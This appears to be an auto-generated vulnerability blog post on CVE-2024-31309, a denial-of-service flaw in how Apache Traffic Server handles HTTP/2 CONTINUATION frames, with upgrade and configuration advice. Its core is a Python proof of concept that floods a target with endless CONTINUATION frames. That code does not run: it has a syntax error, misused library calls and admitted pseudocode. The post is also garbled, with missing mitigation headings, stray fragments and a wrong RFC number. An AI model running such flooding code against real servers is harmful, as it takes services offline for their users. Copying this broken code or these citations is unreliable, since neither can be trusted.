CVE CyberSecurity Database News

CVE-2024-31309 - How an HTTP/2 CONTINUATION DoS Attack Impacts Apache Traffic Server (With Exploit Details & Mitigation Guide)

Poster -

Apache Traffic Server (ATS) is a powerful, flexible caching proxy server used by big companies and many critical web applications. However, like any complex software, it can have vulnerabilities. In early 2024, a serious issue—CVE-2024-31309—was disclosed, impacting any ATS deployment running specific versions. If you use ATS for HTTP/2 traffic, this read is for you.

This post will explain the vulnerability in simple language, show you how an attacker can exploit it, and, most importantly, tell you how to fix it. We'll use clear code snippets, configuration tips, and share links to original resources at the end.

What is CVE-2024-31309?

CVE-2024-31309 is a Denial of Service (DoS) vulnerability affecting Apache Traffic Server’s HTTP/2 implementation. Specifically, how it processes CONTINUATION frames—a part of the HTTP/2 protocol used to carry large headers across multiple frames.

If an attacker sends an uncontrolled number of CONTINUATION frames, it can cause ATS to use excessive CPU and memory. Ultimately, this slows down the server or even crashes it, meaning real users can’t use your website or service.

Let’s make this clear.

In HTTP/2, headers can be split into HEADERS and CONTINUATION frames for efficiency. But if an attacker keeps sending CONTINUATION frames, never finishing the header, ATS keeps processing them—and burns a lot of system resources waiting forever for the full header to finish. With enough bogus connections, this can overwhelm or crash your server.

Proof-of-Concept (PoC) Exploit

Here’s Python 3 code showing the basics of this attack using the h2 library, which you can install using pip install h2. This code only demonstrates how CONTINUATION frames can stack up and is for educational purposes only.

import socket
import ssl
import h2.connection

HOST = 'YOUR_ATS_SERVER'  # Replace with your ATS server
PORT = 443  # or 80 if plain HTTP

# Prepare socket (using SSL since HTTP/2 is often over TLS)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = ssl.wrap_socket(s)
s.connect((HOST, PORT))

conn = h2.connection.H2Connection()
conn.initiate_connection()
s.sendall(conn.data_to_send())

# Send a HEADERS frame, but don't finish the headers block
headers = [
    (':method', 'GET'),
    (':scheme', 'https'),
    (':authority', HOST),
    (':path', '/')
]
s.sendall(conn.encoder.encode(headers, stream_id=1, end_headers=False))

# Now, send many CONTINUATION frames, never finishing headers
# There is no public h2 API for raw CONTINUATION frame, so this is pseudocode.
# You would have to craft raw HTTP/2 frames here.
while True:
    # This would send a CONTINUATION frame (in real code, must craft the frame)
    s.sendall(b'\x00\x00\x00\x09\x00\x00\x00\x00\x01' + b'\x00'*)  # Fake CONTINUATION frame

What does this do?

- It starts an HTTP/2 connection.

Loops endlessly, pushing empty CONTINUATION frames.

- ATS wastes resources waiting for a header that never arrives—but keeps using memory to store fragments.

With enough open connections, the server can become slow or unresponsive.

9.2.4 and later

Do this as soon as possible. Download the latest ATS releases.

A new configuration variable was introduced

proxy.config.http2.max_continuation_frames_per_minute

Set it to a reasonable number of CONTINUATION frames allowed each minute per connection. Too low might affect some (rare) clients, but for most web traffic, values like 10–20 are more than enough.

`

This helps restrict abusive clients until you can upgrade.

Memory Limits

ATS does restrict per-request memory usage (since older versions), but this issue allowed attackers to waste CPU/time anyway. Even with memory limits, do not skip the upgrade or config change.

References

- Official CVE: CVE-2024-31309 at NVD

Apache Traffic Server Security Advisory:

https://lists.apache.org/thread/z7b6j3mbvt6kjqp58snztg2jm7np99b9

Apache Traffic Server downloads:

https://downloads.apache.org/trafficserver/
- HTTP/2 CONTINUATION frame spec:
RFC 754 Section 6.10
- Python h2 library (for HTTP/2 fuzzing/testing):
https://python-hyper.org/h2/en/stable/

Summary

- CVE-2024-31309 impacts HTTP/2 use in Apache Traffic Server, allowing a denial of service with CONTINUATION frames.

Update to at least 8.1.10 or 9.2.4 for a permanent fix.

- Use proxy.config.http2.max_continuation_frames_per_minute to reduce risk, but only as a temporary stopgap.
- Don't ignore this if you serve web traffic with HTTP/2 and ATS!

Timeline

Published on: 04/10/2024 12:15:09 UTC
Last modified on: 11/12/2024 19:35:07 UTC